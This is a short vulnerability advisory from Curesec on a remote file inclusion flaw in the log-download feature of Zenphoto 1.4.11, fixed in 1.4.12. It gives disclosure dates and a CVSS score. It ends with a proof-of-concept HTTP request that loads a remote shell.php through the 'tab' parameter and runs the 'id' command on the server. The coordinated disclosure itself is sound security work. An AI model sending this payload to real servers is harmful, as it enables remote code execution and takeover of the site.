Affected Product: Zenphoto 1.4.11
Fixed in: 1.4.12
Fixed Version Link: https://github.com/zenphoto/zenphoto/archive/
zenphoto-1.4.12.zip
Vendor Website: http://www.zenphoto.org/
Vulnerability Type: RFI
Remote Exploitable: Yes
Reported to vendor: 01/29/2016
Disclosed to 03/15/2016
public:
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Zenphoto is a CMS for hosting images, written in PHP. In version 1.4.11, it is
vulnerable to remote file inclusion. An admin account is required.
3. Details
Description
CVSS: High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C
When downloading a log file, the input is not properly sanitized, leading to
RFI.
An admin account is required, and allow_url_fopen must be set to true - which
is the default setting.
In old versions of PHP, this would additionally lead to LFI via null byte
poisoning or path expansion, regardless of allow_url_fopen settings.
Proof of Concept
GET /zenphoto-zenphoto-1.4.11/zp-core/admin-logs.php?action=download_log&page=
logs&tab=http://localhost/shell.php%3f%78%3d%69%64%26%66%6f%6f%3d&filename=
security&XSRFToken=afd5bafed21279d837486fd2beea81f87bc29dea HTTP/1.1